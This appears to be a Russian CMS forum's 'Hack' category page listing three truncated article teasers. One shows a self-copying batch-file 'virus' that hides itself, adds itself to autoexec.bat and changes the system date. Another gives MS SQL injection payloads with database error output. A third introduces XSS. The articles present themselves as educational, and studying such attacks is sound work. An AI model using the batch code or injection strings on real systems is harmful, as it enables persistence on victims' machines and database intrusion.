Язык
Контакты
GitHub
Поддержка
Регистрация
Войти
Логин: Пароль: Запомнить:
Пользователи
Голосование

    Какую CMS Вы предпочитаете

    AtomX
    Fapos CMS
    Drunya CMS
Последние комментарии
Автор: чайник, в новости:

Что такое API и для чего они нужны

Автор: HIshnik, в новости:

Классы в PHP для чайников

Автор: Аноним, в новости:

Написание простого вируса в блокноте

Автор: stream, в новости:

Создаем BB коды на PHP

Автор: boriska, в новости:

Релиз Atom-M CMS 4

Автор: 0leg, в новости:

Релиз Atom-M CMS 4

Топ пользователей
Drunya
Репутация: 108
Сообщений: 3531
Сашка_из_Шебекино
Репутация: 87
Сообщений: 1803
boriska
Репутация: 65
Сообщений: 846
ARMI
Репутация: 46
Сообщений: 1859
BAH0
Репутация: 26
Сообщений: 544
Материалов в категории:3
1
Недавно решил немного расширить свой кругозор в области безопасности и немного порылся в сети на тему простых вирусов в кустарных условиях. Оказывается вирусы можно создавать даже в простом блокноте. Информацию об этом я представляю только в ознакомительных целях. Помните писать вирусы - плохо. Вам же наверное не приятно когда ваш любимый компьютер заражают, вот и вы не поступайте так с другими.

Писать будем bat файл в обычном виндовом блокноте. Создаем файл и пишем.


@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
:abc ( ……если он существует, то программа перейдет на метку :
Автор: Drunya Раздел: Hack Добавлено: 12 Июл 2011
Я не буду рассказывать об азах инъекций в MS SQL, на эту тему написано и сказано уже очень много. Я хочу поделится некоторым своим опытом, набранным бессонными ночами, когда я ковырял гимморные ms sql инжекты и курил мануалы, пытаясь понять, что я делаю неправильно.

Итак, начнем с поиска инъекций на сайте. Иногда я встречал инжект в post запросах, в скриптах поиска по сайту или в скрипте напоминании пароля. В этом случае на традиционный запрос 1’+or+1=@@version-- скрипт будет ругаться примерно так:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/inc/inc_customer.asp, line 103

ошибка возникает из за символа “+”, поэтому вот такой запрос:

1’ or 1=@@version--

в данном случае пройдет на ура и выдаст нам версию сервера.

Следующая проблема, которая вызывает массу вопросов у новичков, и которая в свое время тоже вогнала меня в ступор, это фильтрация кавычки. Она приводит к т
Автор: Drunya Раздел: Hack Добавлено: 25 Июн 2011
Собственно, если кто не в курсе, XSS - это межсайтовый скриптинг (Cross Site Scripting), но так как аббревиатура "CSS" уже занята, данный вид уязвимостей был окрещен XSS. Но так как я сейчас рассказал расказывают везде, а хотелось бы преподнести все еще проще и понятней, да так что бы человек далекий от премудростей сайтостроения и программирования понял, что же это такое и нахрен о нем вообще писать. Ну что же, какой тяжелой бы не оказалась ноша, которую я на себя взвалил, я постараюсь донести ее до конца с гордым лицом....и легкой ухмылкой:)

Теория в примерах
По сути XSS - это запуск некоего скрипта на целевом сайте. Этот скрипт обычно находится на другом сервере и о том что его можно запутить хозяин целевого сайта не подозревает, но иногда этого и не приходиться делать, так как можно просто отправить некий код во входящих данных и он будет выполнен. Рассмотрим примеры с BB кодами.
Некоторое время назад, в одном из всемирно известных движках была обн
Автор: Drunya Раздел: Hack Добавлено: 17 Сен 2010
1
Сейчас online: 9. Зарегистрированных: 1. Гостей: 8.
-->